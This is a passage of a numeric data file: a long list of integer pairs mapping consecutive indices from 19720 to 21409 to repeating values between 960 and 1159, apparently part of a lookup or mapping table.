(19720, 977),
(19721, 977),
(19722, 977),
(19723, 978),
(19724, 978),
(19725, 978),
(19726, 978),
(19727, 978),
(19728, 978),
(19729, 979),
(19730, 979),
(19731, 979),
(19732, 979),
(19733, 979),
(19734, 979),
(19735, 980),
(19736, 980),
(19737, 980),
(19738, 980),
(19739, 980),
(19740, 980),
(19741, 981),
(19742, 981),
(19743, 981),
(19744, 981),
(19745, 981),
(19746, 981),
(19747, 982),
(19748, 982),
(19749, 982),
(19750, 982),
(19751, 982),
(19752, 982),
(19753, 983),
(19754, 983),
(19755, 983),
(19756, 983),
(19757, 983),
(19758, 983),
(19759, 984),
(19760, 984),
(19761, 984),
(19762, 984),
(19763, 984),
(19764, 984),
(19765, 985),
(19766, 985),
(19767, 985),
(19768, 985),
(19769, 985),
(19770, 985),
(19771, 986),
(19772, 986),
(19773, 986),
(19774, 986),
(19775, 986),
(19776, 986),
(19777, 987),
(19778, 987),
(19779, 987),
(19780, 987),
(19781, 987),
(19782, 987),
(19783, 988),
(19784, 988),
(19785, 988),
(19786, 988),
(19787, 988),
(19788, 988),
(19789, 989),
(19790, 989),
(19791, 989),
(19792, 989),
(19793, 989),
(19794, 989),
(19795, 989),
(19796, 989),
(19797, 989),
(19798, 990),
(19799, 990),
(19800, 990),
(19801, 990),
(19802, 990),
(19803, 990),
(19804, 991),
(19805, 991),
(19806, 991),
(19807, 991),
(19808, 991),
(19809, 991),
(19810, 992),
(19811, 992),
(19812, 992),
(19813, 992),
(19814, 992),
(19815, 992),
(19816, 993),
(19817, 993),
(19818, 993),
(19819, 993),
(19820, 993),
(19821, 993),
(19822, 994),
(19823, 994),
(19824, 994),
(19825, 994),
(19826, 994),
(19827, 994),
(19828, 995),
(19829, 995),
(19830, 995),
(19831, 995),
(19832, 995),
(19833, 995),
(19834, 996),
(19835, 996),
(19836, 996),
(19837, 996),
(19838, 996),
(19839, 996),
(19840, 997),
(19841, 997),
(19842, 997),
(19843, 997),
(19844, 997),
(19845, 997),
(19846, 998),
(19847, 998),
(19848, 998),
(19849, 998),
(19850, 998),
(19851, 998),
(19852, 999),
(19853, 999),
(19854, 999),
(19855, 999),
(19856, 999),
(19857, 999),
(19858, 1000),
(19859, 1000),
(19860, 1000),
(19861, 1000),
(19862, 1000),
(19863, 1000),
(19864, 1001),
(19865, 1001),
(19866, 1001),
(19867, 1001),
(19868, 1001),
(19869, 1001),
(19870, 1002),
(19871, 1002),
(19872, 1002),
(19873, 1002),
(19874, 1002),
(19875, 1002),
(19876, 1002),
(19877, 1002),
(19878, 1002),
(19879, 1003),
(19880, 1003),
(19881, 1003),
(19882, 1003),
(19883, 1003),
(19884, 1003),
(19885, 1004),
(19886, 1004),
(19887, 1004),
(19888, 1004),
(19889, 1004),
(19890, 1004),
(19891, 1005),
(19892, 1005),
(19893, 1005),
(19894, 1005),
(19895, 1005),
(19896, 1005),
(19897, 1006),
(19898, 1006),
(19899, 1006),
(19900, 1006),
(19901, 1006),
(19902, 1006),
(19903, 1007),
(19904, 1007),
(19905, 1007),
(19906, 1007),
(19907, 1007),
(19908, 1007),
(19909, 1008),
(19910, 1008),
(19911, 1008),
(19912, 1008),
(19913, 1008),
(19914, 1008),
(19915, 1009),
(19916, 1009),
(19917, 1009),
(19918, 1009),
(19919, 1009),
(19920, 1009),
(19921, 1010),
(19922, 1010),
(19923, 1010),
(19924, 1010),
(19925, 1010),
(19926, 1010),
(19927, 1011),
(19928, 1011),
(19929, 1011),
(19930, 1011),
(19931, 1011),
(19932, 1011),
(19933, 1012),
(19934, 1012),
(19935, 1012),
(19936, 1012),
(19937, 1012),
(19938, 1012),
(19939, 1013),
(19940, 1013),
(19941, 1013),
(19942, 1013),
(19943, 1013),
(19944, 1013),
(19945, 1014),
(19946, 1014),
(19947, 1014),
(19948, 1014),
(19949, 1014),
(19950, 1014),
(19951, 1015),
(19952, 1015),
(19953, 1015),
(19954, 1015),
(19955, 1015),
(19956, 1015),
(19957, 1015),
(19958, 1015),
(19959, 1015),
(19960, 1016),
(19961, 1016),
(19962, 1016),
(19963, 1016),
(19964, 1016),
(19965, 1016),
(19966, 1017),
(19967, 1017),
(19968, 1017),
(19969, 1017),
(19970, 1017),
(19971, 1017),
(19972, 1018),
(19973, 1018),
(19974, 1018),
(19975, 1018),
(19976, 1018),
(19977, 1018),
(19978, 1019),
(19979, 1019),
(19980, 1019),
(19981, 1019),
(19982, 1019),
(19983, 1019),
(19984, 1020),
(19985, 1020),
(19986, 1020),
(19987, 1020),
(19988, 1020),
(19989, 1020),
(19990, 1021),
(19991, 1021),
(19992, 1021),
(19993, 1021),
(19994, 1021),
(19995, 1021),
(19996, 1022),
(19997, 1022),
(19998, 1022),
(19999, 1022),
(20000, 1022),
(20001, 1022),
(20002, 1023),
(20003, 1023),
(20004, 1023),
(20005, 1023),
(20006, 1023),
(20007, 1023),
(20008, 1024),
(20009, 1024),
(20010, 1024),
(20011, 1024),
(20012, 1024),
(20013, 1024),
(20014, 1025),
(20015, 1025),
(20016, 1025),
(20017, 1025),
(20018, 1025),
(20019, 1025),
(20020, 1026),
(20021, 1026),
(20022, 1026),
(20023, 1026),
(20024, 1026),
(20025, 1026),
(20026, 1027),
(20027, 1027),
(20028, 1027),
(20029, 1027),
(20030, 1027),
(20031, 1027),
(20032, 1028),
(20033, 1028),
(20034, 1028),
(20035, 1028),
(20036, 1028),
(20037, 1028),
(20038, 1028),
(20039, 1028),
(20040, 1028),
(20041, 1029),
(20042, 1029),
(20043, 1029),
(20044, 1029),
(20045, 1029),
(20046, 1029),
(20047, 1030),
(20048, 1030),
(20049, 1030),
(20050, 1030),
(20051, 1030),
(20052, 1030),
(20053, 1031),
(20054, 1031),
(20055, 1031),
(20056, 1031),
(20057, 1031),
(20058, 1031),
(20059, 1032),
(20060, 1032),
(20061, 1032),
(20062, 1032),
(20063, 1032),
(20064, 1032),
(20065, 1033),
(20066, 1033),
(20067, 1033),
(20068, 1033),
(20069, 1033),
(20070, 1033),
(20071, 1034),
(20072, 1034),
(20073, 1034),
(20074, 1034),
(20075, 1034),
(20076, 1034),
(20077, 1035),
(20078, 1035),
(20079, 1035),
(20080, 1035),
(20081, 1035),
(20082, 1035),
(20083, 1036),
(20084, 1036),
(20085, 1036),
(20086, 1036),
(20087, 1036),
(20088, 1036),
(20089, 1037),
(20090, 1037),
(20091, 1037),
(20092, 1037),
(20093, 1037),
(20094, 1037),
(20095, 1038),
(20096, 1038),
(20097, 1038),
(20098, 1038),
(20099, 1038),
(20100, 1038),
(20101, 1039),
(20102, 1039),
(20103, 1039),
(20104, 1039),
(20105, 1039),
(20106, 1039),
(20107, 1040),
(20108, 1040),
(20109, 1040),
(20110, 1040),
(20111, 1040),
(20112, 1040),
(20113, 1041),
(20114, 1041),
(20115, 1041),
(20116, 1041),
(20117, 1041),
(20118, 1041),
(20119, 1041),
(20120, 1041),
(20121, 1041),
(20122, 1042),
(20123, 1042),
(20124, 1042),
(20125, 1042),
(20126, 1042),
(20127, 1042),
(20128, 1043),
(20129, 1043),
(20130, 1043),
(20131, 1043),
(20132, 1043),
(20133, 1043),
(20134, 1044),
(20135, 1044),
(20136, 1044),
(20137, 1044),
(20138, 1044),
(20139, 1044),
(20140, 1045),
(20141, 1045),
(20142, 1045),
(20143, 1045),
(20144, 1045),
(20145, 1045),
(20146, 1046),
(20147, 1046),
(20148, 1046),
(20149, 1046),
(20150, 1046),
(20151, 1046),
(20152, 1047),
(20153, 1047),
(20154, 1047),
(20155, 1047),
(20156, 1047),
(20157, 1047),
(20158, 1048),
(20159, 1048),
(20160, 1048),
(20161, 1048),
(20162, 1048),
(20163, 1048),
(20164, 1049),
(20165, 1049),
(20166, 1049),
(20167, 1049),
(20168, 1049),
(20169, 1049),
(20170, 1050),
(20171, 1050),
(20172, 1050),
(20173, 1050),
(20174, 1050),
(20175, 1050),
(20176, 1051),
(20177, 1051),
(20178, 1051),
(20179, 1051),
(20180, 1051),
(20181, 1051),
(20182, 1052),
(20183, 1052),
(20184, 1052),
(20185, 1052),
(20186, 1052),
(20187, 1052),
(20188, 1053),
(20189, 1053),
(20190, 1053),
(20191, 1053),
(20192, 1053),
(20193, 1053),
(20194, 1054),
(20195, 1054),
(20196, 1054),
(20197, 1054),
(20198, 1054),
(20199, 1054),
(20200, 1055),
(20201, 1055),
(20202, 1055),
(20203, 1055),
(20204, 1055),
(20205, 1055),
(20206, 1056),
(20207, 1056),
(20208, 1056),
(20209, 1056),
(20210, 1056),
(20211, 1056),
(20212, 1057),
(20213, 1057),
(20214, 1057),
(20215, 1057),
(20216, 1057),
(20217, 1057),
(20218, 1057),
(20219, 1057),
(20220, 1057),
(20221, 1058),
(20222, 1058),
(20223, 1058),
(20224, 1058),
(20225, 1058),
(20226, 1058),
(20227, 1059),
(20228, 1059),
(20229, 1059),
(20230, 1059),
(20231, 1059),
(20232, 1059),
(20233, 960),
(20234, 960),
(20235, 961),
(20236, 961),
(20237, 962),
(20238, 962),
(20239, 963),
(20240, 964),
(20241, 964),
(20242, 965),
(20243, 965),
(20244, 966),
(20245, 966),
(20246, 967),
(20247, 967),
(20248, 968),
(20249, 968),
(20250, 969),
(20251, 969),
(20252, 970),
(20253, 970),
(20254, 971),
(20255, 971),
(20256, 972),
(20257, 972),
(20258, 973),
(20259, 973),
(20260, 974),
(20261, 974),
(20262, 975),
(20263, 975),
(20264, 976),
(20265, 977),
(20266, 977),
(20267, 978),
(20268, 978),
(20269, 979),
(20270, 979),
(20271, 980),
(20272, 980),
(20273, 981),
(20274, 981),
(20275, 982),
(20276, 982),
(20277, 983),
(20278, 983),
(20279, 984),
(20280, 984),
(20281, 985),
(20282, 985),
(20283, 986),
(20284, 986),
(20285, 987),
(20286, 987),
(20287, 988),
(20288, 988),
(20289, 989),
(20290, 990),
(20291, 990),
(20292, 991),
(20293, 991),
(20294, 992),
(20295, 992),
(20296, 993),
(20297, 993),
(20298, 994),
(20299, 994),
(20300, 995),
(20301, 995),
(20302, 996),
(20303, 996),
(20304, 997),
(20305, 997),
(20306, 998),
(20307, 998),
(20308, 999),
(20309, 999),
(20310, 1000),
(20311, 1000),
(20312, 1001),
(20313, 1001),
(20314, 1002),
(20315, 1003),
(20316, 1003),
(20317, 1004),
(20318, 1004),
(20319, 1005),
(20320, 1005),
(20321, 1006),
(20322, 1006),
(20323, 1007),
(20324, 1007),
(20325, 1008),
(20326, 1008),
(20327, 1009),
(20328, 1009),
(20329, 1010),
(20330, 1010),
(20331, 1011),
(20332, 1011),
(20333, 1012),
(20334, 1012),
(20335, 1013),
(20336, 1013),
(20337, 1014),
(20338, 1014),
(20339, 1015),
(20340, 1016),
(20341, 1016),
(20342, 1017),
(20343, 1017),
(20344, 1018),
(20345, 1018),
(20346, 1019),
(20347, 1019),
(20348, 1020),
(20349, 1020),
(20350, 1021),
(20351, 1021),
(20352, 1022),
(20353, 1022),
(20354, 1023),
(20355, 1023),
(20356, 1024),
(20357, 1024),
(20358, 1025),
(20359, 1025),
(20360, 1026),
(20361, 1026),
(20362, 1027),
(20363, 1027),
(20364, 1028),
(20365, 1029),
(20366, 1029),
(20367, 1030),
(20368, 1030),
(20369, 1031),
(20370, 1031),
(20371, 1032),
(20372, 1032),
(20373, 1033),
(20374, 1033),
(20375, 1034),
(20376, 1034),
(20377, 1035),
(20378, 1035),
(20379, 1036),
(20380, 1036),
(20381, 1037),
(20382, 1037),
(20383, 1038),
(20384, 1038),
(20385, 1039),
(20386, 1039),
(20387, 1040),
(20388, 1040),
(20389, 1041),
(20390, 1042),
(20391, 1042),
(20392, 1043),
(20393, 1043),
(20394, 1044),
(20395, 1044),
(20396, 1045),
(20397, 1045),
(20398, 1046),
(20399, 1046),
(20400, 1047),
(20401, 1047),
(20402, 1048),
(20403, 1048),
(20404, 1049),
(20405, 1049),
(20406, 1050),
(20407, 1050),
(20408, 1051),
(20409, 1051),
(20410, 1052),
(20411, 1052),
(20412, 1053),
(20413, 1053),
(20414, 1054),
(20415, 1054),
(20416, 1055),
(20417, 1055),
(20418, 1056),
(20419, 1056),
(20420, 1057),
(20421, 1058),
(20422, 1058),
(20423, 1059),
(20424, 1059),
(20425, 1060),
(20426, 1061),
(20427, 1062),
(20428, 1063),
(20429, 1064),
(20430, 1065),
(20431, 1066),
(20432, 1067),
(20433, 1068),
(20434, 1069),
(20435, 1070),
(20436, 1071),
(20437, 1072),
(20438, 1073),
(20439, 1074),
(20440, 1075),
(20441, 1076),
(20442, 1077),
(20443, 1078),
(20444, 1079),
(20445, 1080),
(20446, 1081),
(20447, 1082),
(20448, 1083),
(20449, 1084),
(20450, 1085),
(20451, 1086),
(20452, 1087),
(20453, 1088),
(20454, 1089),
(20455, 1090),
(20456, 1091),
(20457, 1092),
(20458, 1093),
(20459, 1094),
(20460, 1095),
(20461, 1096),
(20462, 1097),
(20463, 1098),
(20464, 1099),
(20465, 1100),
(20466, 1101),
(20467, 1102),
(20468, 1103),
(20469, 1104),
(20470, 1105),
(20471, 1106),
(20472, 1107),
(20473, 1108),
(20474, 1109),
(20475, 1110),
(20476, 1111),
(20477, 1112),
(20478, 1113),
(20479, 1114),
(20480, 1115),
(20481, 1116),
(20482, 1117),
(20483, 1118),
(20484, 1119),
(20485, 1120),
(20486, 1121),
(20487, 1122),
(20488, 1123),
(20489, 1124),
(20490, 1125),
(20491, 1126),
(20492, 1127),
(20493, 1128),
(20494, 1129),
(20495, 1130),
(20496, 1131),
(20497, 1132),
(20498, 1133),
(20499, 1134),
(20500, 1135),
(20501, 1136),
(20502, 1137),
(20503, 1138),
(20504, 1139),
(20505, 1140),
(20506, 1141),
(20507, 1142),
(20508, 1143),
(20509, 1144),
(20510, 1145),
(20511, 1146),
(20512, 1147),
(20513, 1148),
(20514, 1149),
(20515, 1150),
(20516, 1151),
(20517, 1152),
(20518, 1153),
(20519, 1154),
(20520, 1155),
(20521, 1156),
(20522, 1157),
(20523, 1158),
(20524, 1159),
(20525, 1060),
(20526, 1061),
(20527, 1061),
(20528, 1061),
(20529, 1062),
(20530, 1063),
(20531, 1064),
(20532, 1064),
(20533, 1064),
(20534, 1065),
(20535, 1066),
(20536, 1067),
(20537, 1067),
(20538, 1067),
(20539, 1068),
(20540, 1069),
(20541, 1070),
(20542, 1070),
(20543, 1070),
(20544, 1071),
(20545, 1072),
(20546, 1073),
(20547, 1073),
(20548, 1073),
(20549, 1074),
(20550, 1075),
(20551, 1076),
(20552, 1076),
(20553, 1076),
(20554, 1077),
(20555, 1078),
(20556, 1079),
(20557, 1079),
(20558, 1079),
(20559, 1080),
(20560, 1081),
(20561, 1082),
(20562, 1082),
(20563, 1082),
(20564, 1083),
(20565, 1084),
(20566, 1085),
(20567, 1085),
(20568, 1085),
(20569, 1086),
(20570, 1087),
(20571, 1088),
(20572, 1088),
(20573, 1088),
(20574, 1089),
(20575, 1089),
(20576, 1089),
(20577, 1090),
(20578, 1090),
(20579, 1090),
(20580, 1091),
(20581, 1092),
(20582, 1093),
(20583, 1093),
(20584, 1093),
(20585, 1094),
(20586, 1095),
(20587, 1096),
(20588, 1096),
(20589, 1096),
(20590, 1097),
(20591, 1098),
(20592, 1099),
(20593, 1099),
(20594, 1099),
(20595, 1100),
(20596, 1101),
(20597, 1102),
(20598, 1102),
(20599, 1102),
(20600, 1103),
(20601, 1104),
(20602, 1105),
(20603, 1105),
(20604, 1105),
(20605, 1106),
(20606, 1107),
(20607, 1108),
(20608, 1108),
(20609, 1109),
(20610, 1110),
(20611, 1111),
(20612, 1111),
(20613, 1112),
(20614, 1113),
(20615, 1114),
(20616, 1114),
(20617, 1115),
(20618, 1116),
(20619, 1117),
(20620, 1117),
(20621, 1118),
(20622, 1119),
(20623, 1120),
(20624, 1120),
(20625, 1121),
(20626, 1121),
(20627, 1122),
(20628, 1122),
(20629, 1122),
(20630, 1123),
(20631, 1123),
(20632, 1123),
(20633, 1124),
(20634, 1124),
(20635, 1124),
(20636, 1125),
(20637, 1125),
(20638, 1125),
(20639, 1126),
(20640, 1126),
(20641, 1126),
(20642, 1127),
(20643, 1127),
(20644, 1127),
(20645, 1128),
(20646, 1128),
(20647, 1128),
(20648, 1129),
(20649, 1130),
(20650, 1131),
(20651, 1131),
(20652, 1131),
(20653, 1132),
(20654, 1133),
(20655, 1134),
(20656, 1134),
(20657, 1134),
(20658, 1135),
(20659, 1136),
(20660, 1137),
(20661, 1137),
(20662, 1137),
(20663, 1138),
(20664, 1139),
(20665, 1140),
(20666, 1140),
(20667, 1140),
(20668, 1141),
(20669, 1142),
(20670, 1143),
(20671, 1143),
(20672, 1143),
(20673, 1144),
(20674, 1145),
(20675, 1146),
(20676, 1146),
(20677, 1146),
(20678, 1146),
(20679, 1147),
(20680, 1148),
(20681, 1149),
(20682, 1149),
(20683, 1149),
(20684, 1149),
(20685, 1150),
(20686, 1151),
(20687, 1152),
(20688, 1152),
(20689, 1152),
(20690, 1152),
(20691, 1153),
(20692, 1154),
(20693, 1155),
(20694, 1155),
(20695, 1155),
(20696, 1155),
(20697, 1156),
(20698, 1157),
(20699, 1158),
(20700, 1158),
(20701, 1158),
(20702, 1158),
(20703, 1159),
(20704, 1159),
(20705, 1159),
(20706, 1159),
(20707, 1060),
(20708, 1060),
(20709, 1060),
(20710, 1060),
(20711, 1060),
(20712, 1060),
(20713, 1060),
(20714, 1061),
(20715, 1061),
(20716, 1061),
(20717, 1061),
(20718, 1061),
(20719, 1061),
(20720, 1061),
(20721, 1062),
(20722, 1062),
(20723, 1062),
(20724, 1062),
(20725, 1062),
(20726, 1062),
(20727, 1062),
(20728, 1063),
(20729, 1063),
(20730, 1063),
(20731, 1063),
(20732, 1063),
(20733, 1063),
(20734, 1063),
(20735, 1064),
(20736, 1064),
(20737, 1064),
(20738, 1064),
(20739, 1064),
(20740, 1064),
(20741, 1064),
(20742, 1065),
(20743, 1065),
(20744, 1065),
(20745, 1065),
(20746, 1065),
(20747, 1065),
(20748, 1065),
(20749, 1066),
(20750, 1066),
(20751, 1066),
(20752, 1066),
(20753, 1066),
(20754, 1066),
(20755, 1066),
(20756, 1067),
(20757, 1067),
(20758, 1067),
(20759, 1067),
(20760, 1067),
(20761, 1067),
(20762, 1067),
(20763, 1068),
(20764, 1068),
(20765, 1068),
(20766, 1068),
(20767, 1068),
(20768, 1068),
(20769, 1068),
(20770, 1069),
(20771, 1069),
(20772, 1069),
(20773, 1069),
(20774, 1069),
(20775, 1069),
(20776, 1069),
(20777, 1070),
(20778, 1070),
(20779, 1070),
(20780, 1070),
(20781, 1070),
(20782, 1070),
(20783, 1070),
(20784, 1071),
(20785, 1071),
(20786, 1071),
(20787, 1071),
(20788, 1071),
(20789, 1071),
(20790, 1071),
(20791, 1072),
(20792, 1072),
(20793, 1072),
(20794, 1072),
(20795, 1072),
(20796, 1072),
(20797, 1072),
(20798, 1073),
(20799, 1073),
(20800, 1073),
(20801, 1073),
(20802, 1073),
(20803, 1073),
(20804, 1073),
(20805, 1073),
(20806, 1073),
(20807, 1073),
(20808, 1073),
(20809, 1074),
(20810, 1074),
(20811, 1074),
(20812, 1074),
(20813, 1074),
(20814, 1074),
(20815, 1074),
(20816, 1075),
(20817, 1075),
(20818, 1075),
(20819, 1075),
(20820, 1075),
(20821, 1075),
(20822, 1075),
(20823, 1076),
(20824, 1076),
(20825, 1076),
(20826, 1076),
(20827, 1076),
(20828, 1076),
(20829, 1076),
(20830, 1077),
(20831, 1077),
(20832, 1077),
(20833, 1077),
(20834, 1077),
(20835, 1077),
(20836, 1077),
(20837, 1078),
(20838, 1078),
(20839, 1078),
(20840, 1078),
(20841, 1078),
(20842, 1078),
(20843, 1078),
(20844, 1079),
(20845, 1079),
(20846, 1079),
(20847, 1079),
(20848, 1079),
(20849, 1079),
(20850, 1079),
(20851, 1080),
(20852, 1080),
(20853, 1080),
(20854, 1080),
(20855, 1080),
(20856, 1080),
(20857, 1080),
(20858, 1081),
(20859, 1081),
(20860, 1081),
(20861, 1081),
(20862, 1081),
(20863, 1081),
(20864, 1081),
(20865, 1082),
(20866, 1082),
(20867, 1082),
(20868, 1082),
(20869, 1082),
(20870, 1082),
(20871, 1082),
(20872, 1083),
(20873, 1083),
(20874, 1083),
(20875, 1083),
(20876, 1083),
(20877, 1083),
(20878, 1083),
(20879, 1084),
(20880, 1084),
(20881, 1084),
(20882, 1084),
(20883, 1084),
(20884, 1084),
(20885, 1084),
(20886, 1085),
(20887, 1085),
(20888, 1085),
(20889, 1085),
(20890, 1085),
(20891, 1085),
(20892, 1085),
(20893, 1086),
(20894, 1086),
(20895, 1086),
(20896, 1086),
(20897, 1086),
(20898, 1086),
(20899, 1086),
(20900, 1087),
(20901, 1087),
(20902, 1087),
(20903, 1087),
(20904, 1087),
(20905, 1087),
(20906, 1087),
(20907, 1088),
(20908, 1088),
(20909, 1088),
(20910, 1088),
(20911, 1088),
(20912, 1088),
(20913, 1088),
(20914, 1089),
(20915, 1089),
(20916, 1089),
(20917, 1089),
(20918, 1089),
(20919, 1089),
(20920, 1089),
(20921, 1089),
(20922, 1089),
(20923, 1089),
(20924, 1089),
(20925, 1090),
(20926, 1090),
(20927, 1090),
(20928, 1090),
(20929, 1090),
(20930, 1090),
(20931, 1090),
(20932, 1091),
(20933, 1091),
(20934, 1091),
(20935, 1091),
(20936, 1091),
(20937, 1091),
(20938, 1091),
(20939, 1092),
(20940, 1092),
(20941, 1092),
(20942, 1092),
(20943, 1092),
(20944, 1092),
(20945, 1092),
(20946, 1093),
(20947, 1093),
(20948, 1093),
(20949, 1093),
(20950, 1093),
(20951, 1093),
(20952, 1093),
(20953, 1094),
(20954, 1094),
(20955, 1094),
(20956, 1094),
(20957, 1094),
(20958, 1094),
(20959, 1094),
(20960, 1095),
(20961, 1095),
(20962, 1095),
(20963, 1095),
(20964, 1095),
(20965, 1095),
(20966, 1095),
(20967, 1096),
(20968, 1096),
(20969, 1096),
(20970, 1096),
(20971, 1096),
(20972, 1096),
(20973, 1096),
(20974, 1097),
(20975, 1097),
(20976, 1097),
(20977, 1097),
(20978, 1097),
(20979, 1097),
(20980, 1097),
(20981, 1098),
(20982, 1098),
(20983, 1098),
(20984, 1098),
(20985, 1098),
(20986, 1098),
(20987, 1098),
(20988, 1099),
(20989, 1099),
(20990, 1099),
(20991, 1099),
(20992, 1099),
(20993, 1099),
(20994, 1099),
(20995, 1100),
(20996, 1100),
(20997, 1100),
(20998, 1100),
(20999, 1100),
(21000, 1100),
(21001, 1100),
(21002, 1101),
(21003, 1101),
(21004, 1101),
(21005, 1101),
(21006, 1101),
(21007, 1101),
(21008, 1101),
(21009, 1102),
(21010, 1102),
(21011, 1102),
(21012, 1102),
(21013, 1102),
(21014, 1102),
(21015, 1102),
(21016, 1103),
(21017, 1103),
(21018, 1103),
(21019, 1103),
(21020, 1103),
(21021, 1103),
(21022, 1103),
(21023, 1104),
(21024, 1104),
(21025, 1104),
(21026, 1104),
(21027, 1104),
(21028, 1104),
(21029, 1104),
(21030, 1105),
(21031, 1105),
(21032, 1105),
(21033, 1105),
(21034, 1105),
(21035, 1105),
(21036, 1105),
(21037, 1105),
(21038, 1105),
(21039, 1105),
(21040, 1105),
(21041, 1106),
(21042, 1106),
(21043, 1106),
(21044, 1106),
(21045, 1106),
(21046, 1106),
(21047, 1106),
(21048, 1107),
(21049, 1107),
(21050, 1107),
(21051, 1107),
(21052, 1107),
(21053, 1107),
(21054, 1107),
(21055, 1108),
(21056, 1108),
(21057, 1108),
(21058, 1108),
(21059, 1108),
(21060, 1108),
(21061, 1108),
(21062, 1109),
(21063, 1109),
(21064, 1109),
(21065, 1109),
(21066, 1109),
(21067, 1109),
(21068, 1109),
(21069, 1110),
(21070, 1110),
(21071, 1110),
(21072, 1110),
(21073, 1110),
(21074, 1110),
(21075, 1110),
(21076, 1111),
(21077, 1111),
(21078, 1111),
(21079, 1111),
(21080, 1111),
(21081, 1111),
(21082, 1111),
(21083, 1112),
(21084, 1112),
(21085, 1112),
(21086, 1112),
(21087, 1112),
(21088, 1112),
(21089, 1112),
(21090, 1113),
(21091, 1113),
(21092, 1113),
(21093, 1113),
(21094, 1113),
(21095, 1113),
(21096, 1113),
(21097, 1114),
(21098, 1114),
(21099, 1114),
(21100, 1114),
(21101, 1114),
(21102, 1114),
(21103, 1114),
(21104, 1115),
(21105, 1115),
(21106, 1115),
(21107, 1115),
(21108, 1115),
(21109, 1115),
(21110, 1115),
(21111, 1116),
(21112, 1116),
(21113, 1116),
(21114, 1116),
(21115, 1116),
(21116, 1116),
(21117, 1116),
(21118, 1117),
(21119, 1117),
(21120, 1117),
(21121, 1117),
(21122, 1117),
(21123, 1117),
(21124, 1117),
(21125, 1118),
(21126, 1118),
(21127, 1118),
(21128, 1118),
(21129, 1118),
(21130, 1118),
(21131, 1118),
(21132, 1119),
(21133, 1119),
(21134, 1119),
(21135, 1119),
(21136, 1119),
(21137, 1119),
(21138, 1119),
(21139, 1120),
(21140, 1120),
(21141, 1120),
(21142, 1120),
(21143, 1120),
(21144, 1120),
(21145, 1120),
(21146, 1121),
(21147, 1121),
(21148, 1121),
(21149, 1121),
(21150, 1121),
(21151, 1121),
(21152, 1121),
(21153, 1121),
(21154, 1121),
(21155, 1121),
(21156, 1121),
(21157, 1122),
(21158, 1122),
(21159, 1122),
(21160, 1122),
(21161, 1122),
(21162, 1122),
(21163, 1122),
(21164, 1123),
(21165, 1123),
(21166, 1123),
(21167, 1123),
(21168, 1123),
(21169, 1123),
(21170, 1123),
(21171, 1124),
(21172, 1124),
(21173, 1124),
(21174, 1124),
(21175, 1124),
(21176, 1124),
(21177, 1124),
(21178, 1125),
(21179, 1125),
(21180, 1125),
(21181, 1125),
(21182, 1125),
(21183, 1125),
(21184, 1125),
(21185, 1126),
(21186, 1126),
(21187, 1126),
(21188, 1126),
(21189, 1126),
(21190, 1126),
(21191, 1126),
(21192, 1127),
(21193, 1127),
(21194, 1127),
(21195, 1127),
(21196, 1127),
(21197, 1127),
(21198, 1127),
(21199, 1127),
(21200, 1127),
(21201, 1127),
(21202, 1127),
(21203, 1128),
(21204, 1128),
(21205, 1128),
(21206, 1128),
(21207, 1128),
(21208, 1128),
(21209, 1128),
(21210, 1129),
(21211, 1129),
(21212, 1129),
(21213, 1129),
(21214, 1129),
(21215, 1129),
(21216, 1129),
(21217, 1130),
(21218, 1130),
(21219, 1130),
(21220, 1130),
(21221, 1130),
(21222, 1130),
(21223, 1130),
(21224, 1131),
(21225, 1131),
(21226, 1131),
(21227, 1131),
(21228, 1131),
(21229, 1131),
(21230, 1131),
(21231, 1132),
(21232, 1132),
(21233, 1132),
(21234, 1132),
(21235, 1132),
(21236, 1132),
(21237, 1132),
(21238, 1133),
(21239, 1133),
(21240, 1133),
(21241, 1133),
(21242, 1133),
(21243, 1133),
(21244, 1133),
(21245, 1134),
(21246, 1134),
(21247, 1134),
(21248, 1134),
(21249, 1134),
(21250, 1134),
(21251, 1134),
(21252, 1135),
(21253, 1135),
(21254, 1135),
(21255, 1135),
(21256, 1135),
(21257, 1135),
(21258, 1135),
(21259, 1136),
(21260, 1136),
(21261, 1136),
(21262, 1136),
(21263, 1136),
(21264, 1136),
(21265, 1136),
(21266, 1137),
(21267, 1137),
(21268, 1137),
(21269, 1137),
(21270, 1137),
(21271, 1137),
(21272, 1137),
(21273, 1138),
(21274, 1138),
(21275, 1138),
(21276, 1138),
(21277, 1138),
(21278, 1138),
(21279, 1138),
(21280, 1139),
(21281, 1139),
(21282, 1139),
(21283, 1139),
(21284, 1139),
(21285, 1139),
(21286, 1139),
(21287, 1140),
(21288, 1140),
(21289, 1140),
(21290, 1140),
(21291, 1140),
(21292, 1140),
(21293, 1140),
(21294, 1141),
(21295, 1141),
(21296, 1141),
(21297, 1141),
(21298, 1141),
(21299, 1141),
(21300, 1141),
(21301, 1142),
(21302, 1142),
(21303, 1142),
(21304, 1142),
(21305, 1142),
(21306, 1142),
(21307, 1142),
(21308, 1143),
(21309, 1143),
(21310, 1143),
(21311, 1143),
(21312, 1143),
(21313, 1143),
(21314, 1143),
(21315, 1143),
(21316, 1143),
(21317, 1143),
(21318, 1143),
(21319, 1144),
(21320, 1144),
(21321, 1144),
(21322, 1144),
(21323, 1144),
(21324, 1144),
(21325, 1144),
(21326, 1145),
(21327, 1145),
(21328, 1145),
(21329, 1145),
(21330, 1145),
(21331, 1145),
(21332, 1145),
(21333, 1146),
(21334, 1146),
(21335, 1146),
(21336, 1146),
(21337, 1146),
(21338, 1146),
(21339, 1146),
(21340, 1147),
(21341, 1147),
(21342, 1147),
(21343, 1147),
(21344, 1147),
(21345, 1147),
(21346, 1147),
(21347, 1148),
(21348, 1148),
(21349, 1148),
(21350, 1148),
(21351, 1148),
(21352, 1148),
(21353, 1148),
(21354, 1149),
(21355, 1149),
(21356, 1149),
(21357, 1149),
(21358, 1149),
(21359, 1149),
(21360, 1149),
(21361, 1150),
(21362, 1150),
(21363, 1150),
(21364, 1150),
(21365, 1150),
(21366, 1150),
(21367, 1150),
(21368, 1151),
(21369, 1151),
(21370, 1151),
(21371, 1151),
(21372, 1151),
(21373, 1151),
(21374, 1151),
(21375, 1152),
(21376, 1152),
(21377, 1152),
(21378, 1152),
(21379, 1152),
(21380, 1152),
(21381, 1152),
(21382, 1153),
(21383, 1153),
(21384, 1153),
(21385, 1153),
(21386, 1153),
(21387, 1153),
(21388, 1153),
(21389, 1154),
(21390, 1154),
(21391, 1154),
(21392, 1154),
(21393, 1154),
(21394, 1154),
(21395, 1154),
(21396, 1155),
(21397, 1155),
(21398, 1155),
(21399, 1155),
(21400, 1155),
(21401, 1155),
(21402, 1155),
(21403, 1156),
(21404, 1156),
(21405, 1156),
(21406, 1156),
(21407, 1156),
(21408, 1156),
(21409, 1156),
